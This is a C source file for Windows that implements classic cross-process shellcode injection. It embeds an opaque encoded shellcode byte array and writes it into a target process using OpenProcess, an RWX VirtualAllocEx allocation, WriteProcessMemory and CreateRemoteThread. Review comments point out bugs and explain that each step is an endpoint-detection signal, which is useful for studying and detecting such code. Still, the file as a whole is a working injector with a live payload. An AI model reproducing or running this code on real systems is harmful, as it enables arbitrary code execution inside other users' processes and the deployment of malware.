#include <windows.h>
#include <stdio.h>
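/* Process-wide state shared by main(): the target process id, the id of the
 * thread started in it, the two handles returned by the Win32 calls, and the
 * address of the buffer allocated in the target. Integers are initialised
 * with 0 and pointers/handles with NULL; the original used NULL for the
 * DWORDs too, which is a pointer-to-integer conversion under a C compiler
 * that defines NULL as ((void *)0). Values are identical, only the type of
 * the constant is fixed. */
DWORD PID = 0, TID = 0;
HANDLE hProcess = NULL, hThread = NULL;
LPVOID rBuffer = NULL;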
/*
 * Entry point. Reads a target process id from argv[1], copies the byte
 * array `buf` into that process and starts a thread on it, using the
 * OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
 * call sequence. This is the textbook cross-process injection pattern; the
 * same four calls (full-access handle to another process, RWX allocation in
 * it, memory write, remote thread whose start address is that allocation)
 * are what endpoint telemetry and EDR rules key on, so a program with this
 * shape is a detection signal in its own right.
 *
 * Returns 0 unconditionally; failures are only printed, never propagated
 * (see the review notes inline).
 */
int main(int argc, char* argv[])
{
/* Opaque byte array that is executed in the target process; the log line
 * below calls it shellcode. What it does cannot be determined from this
 * file, and its intent is not documented anywhere here. */
unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xdd\xff\xff\xff\x48\x8d\x05\xef"
"\xff\xff\xff\x48\xbb\xfb\x8c\xb4\xbf\x89\xfa\x89\x36\x48"
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x07\xc4\x37"
"\x5b\x79\x12\x49\x36\xfb\x8c\xf5\xee\xc8\xaa\xdb\x67\xad"
"\xc4\x85\x6d\xec\xb2\x02\x64\x9b\xc4\x3f\xed\x91\xb2\x02"
"\x64\xdb\xc4\x3f\xcd\xd9\xb2\x86\x81\xb1\xc6\xf9\x8e\x40"
"\xb2\xb8\xf6\x57\xb0\xd5\xc3\x8b\xd6\xa9\x77\x3a\x45\xb9"
"\xfe\x88\x3b\x6b\xdb\xa9\xcd\xe5\xf7\x02\xa8\xa9\xbd\xb9"
"\xb0\xfc\xbe\x59\x71\x09\xbe\xfb\x8c\xb4\xf7\x0c\x3a\xfd"
"\x51\xb3\x8d\x64\xef\x02\xb2\x91\x72\x70\xcc\x94\xf6\x88"
"\x2a\x6a\x60\xb3\x73\x7d\xfe\x02\xce\x01\x7e\xfa\x5a\xf9"
"\x8e\x40\xb2\xb8\xf6\x57\xcd\x75\x76\x84\xbb\x88\xf7\xc3"
"\x6c\xc1\x4e\xc5\xf9\xc5\x12\xf3\xc9\x8d\x6e\xfc\x22\xd1"
"\x72\x70\xcc\x90\xf6\x88\x2a\xef\x77\x70\x80\xfc\xfb\x02"
"\xba\x95\x7f\xfa\x5c\xf5\x34\x8d\x72\xc1\x37\x2b\xcd\xec"
"\xfe\xd1\xa4\xd0\x6c\xba\xd4\xf5\xe6\xc8\xa0\xc1\xb5\x17"
"\xac\xf5\xed\x76\x1a\xd1\x77\xa2\xd6\xfc\x34\x9b\x13\xde"
"\xc9\x04\x73\xe9\xf7\x33\xfb\x89\x36\xfb\x8c\xb4\xbf\x89"
"\xb2\x04\xbb\xfa\x8d\xb4\xbf\xc8\x40\xb8\xbd\x94\x0b\x4b"
"\x6a\x32\x0a\x3c\x94\xad\xcd\x0e\x19\x1c\x47\x14\xc9\x2e"
"\xc4\x37\x7b\xa1\xc6\x8f\x4a\xf1\x0c\x4f\x5f\xfc\xff\x32"
"\x71\xe8\xfe\xdb\xd5\x89\xa3\xc8\xbf\x21\x73\x61\xdc\xe8"
"\x96\xea\x18\x9e\xf4\xd1\xbf\x89\xfa\x89\x36";
/* NOTE(review): the usage message is printed but the function does not
 * return, so with no argument argv[1] is NULL and atoi(NULL) below is
 * undefined behaviour. A `return 1;` inside this block is the missing step. */
if (argc < 2)
{
printf("usage: %s <PID>", argv[0]);
}
/* atoi() gives no error indication: non-numeric input silently becomes 0. */
PID = atoi(argv[1]);
/* Requests every right on the target (PROCESS_ALL_ACCESS). A cross-process
 * handle opened with this mask is itself a common detection rule trigger. */
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
/* NOTE(review): failure is logged but not fatal; execution continues with a
 * NULL hProcess. The message text has a typo and pairs %d with the DWORD
 * returned by GetLastError() (%lu would match); both are runtime strings
 * and are left untouched here. */
if (hProcess == NULL)
{
printf("falied to got a handle to the process(%d)", GetLastError());
}
/* Allocates sizeof(buf) bytes in the target with PAGE_EXECUTE_READWRITE,
 * i.e. memory that is writable and executable at once. Private RWX regions
 * in another process are a classic memory-scanner and ETW indicator. */
rBuffer = VirtualAllocEx(hProcess, NULL, sizeof(buf), (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE);
/* NOTE(review): same non-fatal pattern as above; a NULL rBuffer is still
 * passed to WriteProcessMemory and CreateRemoteThread below. */
if (rBuffer == NULL)
{
printf("failed to allocate buffer(%d)", GetLastError());
}
/* Return value (BOOL) is ignored and the bytes-written out-parameter is
 * NULL, so a partial or failed write is not detected; the success message
 * is printed regardless. */
WriteProcessMemory(hProcess, rBuffer, buf, sizeof(buf), NULL);
printf("wrote shellcode to allocated buffer\n");
/* Starts a thread in the target whose start routine is the remote buffer
 * itself; TID receives the new thread's id. A remote thread starting at an
 * address outside any loaded image is the third signal in this sequence. */
hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)rBuffer, NULL, 0, &TID);
if (hThread == NULL)
{
printf("failed to get a handle to the new thread(%d)", GetLastError());
}
/* Blocks until the remote thread exits (INFINITE timeout), then releases
 * both handles. If the earlier calls failed these are NULL handles and the
 * calls simply fail; their return values are not checked. */
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
CloseHandle(hProcess);
return 0;
}